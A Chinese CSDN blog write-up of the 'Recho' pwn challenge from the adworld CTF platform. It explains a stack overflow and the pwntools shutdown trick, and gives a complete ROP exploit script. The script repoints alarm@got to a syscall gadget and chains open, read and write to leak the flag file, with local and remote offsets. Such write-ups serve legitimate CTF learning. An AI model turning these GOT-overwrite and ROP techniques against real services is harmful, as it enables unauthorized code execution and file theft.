adword — Recho | pwn题目记录

最新推荐文章于 2024-08-28 11:27:50 发布
最新推荐文章于 2024-08-28 11:27:50 发布
阅读量273 收藏 2
点赞数 3
分类专栏: pwn题目记录 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ULGANOY/article/details/141002551
版权

涉及到以前没接触过的点,记录下。

checksec:
image

IDA:
image

很明显的一个栈溢出,但是一直有一个while循环,就算劫持控制流后也出不了这个循环。这里学到了一个新方法:
pwntools的shutdown('send')

def shutdown(self, direction = "send"):
        """shutdown(direction = "send")
        Closes the tube for futher reading or writing depending on `direction`.
        Arguments:
          direction(str): Which direction to close; "in", "read" or "recv"
            closes the tube in the ingoing direction, "out", "write" or "send"
            closes it in the outgoing direction.
        Returns:
          :const:`None`
        """

但是shutdown后就无法再次利用了,也就是说我们只有一次栈溢出的机会。
所以考虑orw来读取flag文件的内容。

先看看有没有"flag"字符串:
image

然后就是看看plt表(因为我们无法利用libc的函数)
image

有read,write但是没有open。
这里又涉及到一个很妙的点:
汇编看alarm:
image

这里看着是+9处的syscall,但好像对于题目的环境其实是alarm@got+5。

然后就是这里怎么改这个got?
这里又学到了,可以利用这个gadget:
image

因为我们有rdi和rax的gadget,所以可以结合这个add gadget来传入
rdi = alarm@got
rax = 5
来进行修改

其余的gadget都有(程序甚至贴心地给了rdx的gadget)

所以我们的思路

  1. 劫持alarm的got表 => syscall
  2. syscall(open) => read => write 将flag文件写入bss段再读出来

Exp:(打本地的,所以我的alarm@got修改是+9)

flag = 0x0000000000601058
add_rdi_al = 0x000000000040070d
rdi = 0x00000000004008a3
rax = 0x00000000004006fc
rsi_r15 = 0x00000000004008a1
rdx = 0x00000000004006fe
bss = 0x601060

read_plt = elf.plt['read']
write_plt = elf.plt['write']
alarm_plt = elf.plt['alarm']
alarm_got = elf.got['alarm']

pl = b'a'*0x30 + b'b'*0x8

# alarm @got ->syscall
pl += p64(rdi) + p64(alarm_got) + p64(rax) + p64(9) + p64(add_rdi_al)

# open(flag,0)
# rdi , rsi
# syscall rax:2
pl += p64(rdi) + p64(flag) + p64(rsi_r15) + p64(0)*2
pl += p64(rax) + p64(2)
pl += p64(alarm_plt)

# read(3,bss+0x100,0x40)
# rdi , rsi , rdx
pl += p64(rdi) + p64(3) + p64(rsi_r15) + p64(bss+0x100)*2 + p64(rdx) + p64(0x40)
pl += p64(read_plt)
# write(1,bss+0x100,0x40)
pl += p64(rdi) + p64(1) + p64(rsi_r15) + p64(bss+0x100)*2 + p64(rdx) + p64(0x40)
pl += p64(write_plt)
pl = pl.ljust(0x200,b'\x00')
sla("!\n",str(0x200))
sleep(0.1)
sl(pl)

p.shutdown('send')
p.interactive()

image

打远程的话就把+9改为+5即可

# alarm @got ->syscall
pl += p64(rdi) + p64(alarm_got) + p64(rax) + p64(5) + p64(add_rdi_al)

image

N0zoM1z0
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
adworld攻防世界-pwn-新手区-wp
令则
03-05 1089
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
mysql双重分组_MySQL-分组查询(GROUP BY)及二次筛选(HAVING)
weixin_39864682的博客
01-18 3589
为了测试GROUP BY 语句,我们创建两张表,并往表中添加数据-- 创建部门表CREATE TABLE IF NOT EXISTS department(id TINYINT UNSIGNED AUTO_INCREMENT KEY,depName VARCHAR(20) NOT NULL UNIQUE);-- 添加部门INSERT department(depName) VALUES('开发部'...
adword-web-weiphp
32bin的博客
10-24 457
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9z8r4jCN-1666620591304)(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAAAEKADAAQAAAABAAAAEAAAAAA0VXHyAAA
【偶尔一道ctf】xctf adword mobile easy-apk
qq_28205153的博客
08-18 2041
最近在学习ctf,偶尔会做一些ctf题,打算记录下做题的步骤和思路,打算学习ctf的小白可以跟着一起动手学习。本题是安卓题目题目apk下载地址 https://adworld.xctf.org.cn/media/task/attachments/989ca07c3f90426fa05406e4369901ff.apk 下载完后,重命名为 easy-apk.apk。 使用 jeb 反编译,本次使用的是 jeb 3.19 ,网上有破解版本下载,也可以在公众号回复 jeb 获取 把 apk 文件拖到 jeb
【大数据】八、web广告(Adword贪心、Balance)
ywm_up
07-09 738
文章目录1 在线广告相关问题2 在线和离线区别3 Adword 问题定义3.1 Adword 贪心例题3.2 Balance 算法 1 在线广告相关问题 在评价广告时,必须要考虑如下几个因素: 广告在列表中的位置将对它是否被点击有很大的影响; 广告的吸引力可能取决于查询词项; 在较精确地估计出点击率之前,所有的广告都应该有展示的机会。 2 在线和离线区别 能不能看到全部的数据 离线算法:将算法所需要的所有数据准备好,然后,算法以任意次序访问数据,最后,算法输出结果。这类算法称为“离线" (off-li
[广告排行]Google Adwords 广告代理平台_adword.rar
04-20
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。...【项目质量】:所有源码都经过严格测试,可以直接...
Google-Adwords-开源
07-05
Google AdWords 是谷歌提供的一个在线广告服务平台,帮助企业或个人通过搜索结果、网站、移动应用等渠道展示广告,吸引潜在客户。而"Google-Adwords-开源"指的是一个针对 Google AdWords API 的开源 Perl 模块,它...
多进程和多线程基础概念LINUX
2301_79109608的博客
08-22 1905
直接访问物理地址,会导致地址空间没有隔离,很容易导致数据被修改通过虚拟地址空间可以实现每个进程空间都是独立的,操作系统会映射到不用的物理地址区间,在访问时互不干扰.进程状态分为三个基本状态,即运行态,就绪态,阻塞态。在五态模型中,进程分为新建态、终止态,运行态,就绪态,阻塞态。并发:有限的 cpu 核芯的情况下 ,利用快速交替(时间片轮转)执行来达到宏观上的同时执行。虚拟地址 : 虚拟地址并不代表真实的内存空间,而是一个用于寻址的编号。并行:在 cpu 多核的支持下,实现物理上的同时执行。
Linux 线程的控制 互斥与同步
qq_63145217的博客
08-23 1463
include //头文件sem_t sem;信号量的类型 信号量的变量。
虚拟内存和linux(操作系统八股文part1)
linjixia的博客
08-24 1191
八股之虚拟内存和Linux部分的笔记。
Linux中杀死占用某个端口的进程
靖妖傩舞
08-28 322
选项表示强制终止进程,但这种方式可能会导致数据丢失或其他不良后果,所以在使用时要谨慎。确定要杀死的进程 PID。从上述步骤中获取到占用端口 9997 的进程 PID。
Linuxctags——R的使用
m0_71703182的博客
08-23 716
按下。
Linux 进程 | 进程优先级&进程的环境变量
TTKunn的博客
08-23 1577
本文主要内容为进程的优先级和进程的环境变量,其中含有查看进程、优先级概念、环境变量概念等详细内容
linux发邮件的操作流程和注意事项有哪些?
danplus的博客
08-23 580
掌握Linux发邮件的操作流程和注意事项,可以帮助你在Linux系统中高效、安全地发送邮件。AokSend:集成API与SMTP,Linux下一键高效发邮件,稳定可靠,营销自动化首选!
Linux-部署YUM仓库及NFS共享服务
qq_42520799的博客
08-25 956
YUM仓库服务、NFS共享存储服务等
linux上datax 安装以及使用
寂夜了无痕的博客
08-24 2525
linux上datax 安装以及使用
fork exec cow
bonfirelit的博客
08-23 912
在fork()时:COW 允许父进程和子进程共享相同的内存页面,直到有一个进程进行写操作。这减少了不必要的内存复制,提高了性能。在exec()时:COW 提供的内存共享机制可以避免在调用exec()之前进行不必要的内存复制,但在exec()调用之后,这些共享内存将被新加载的可执行文件所取代。
linux terminal文件查找
最新发布
xidianhuihui的专栏
08-28 591
以下所有命令仅仅只做常见用法的介绍,不做详细的参数介绍如需详细介绍,可到查阅以下的显示结果均为使用oh-my-zsh的显示结果,如果是使用bash可能略有差异:zsh 默认情况下不支持通配符匹配,需要在~/.zshrc中添加即可。
.NET技术解析:一步步学函数调用堆栈分析
3. **数据定义**:`.data`段包含了常量字符串和变量,如`szTextFmt`用于格式化输出,`adword1000`和`bdword2000`分别表示函数的输入参数`a`和`b`。 4. **函数声明**:`printfPROTOC:DWORD,:VARARG`是函数原型声明,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值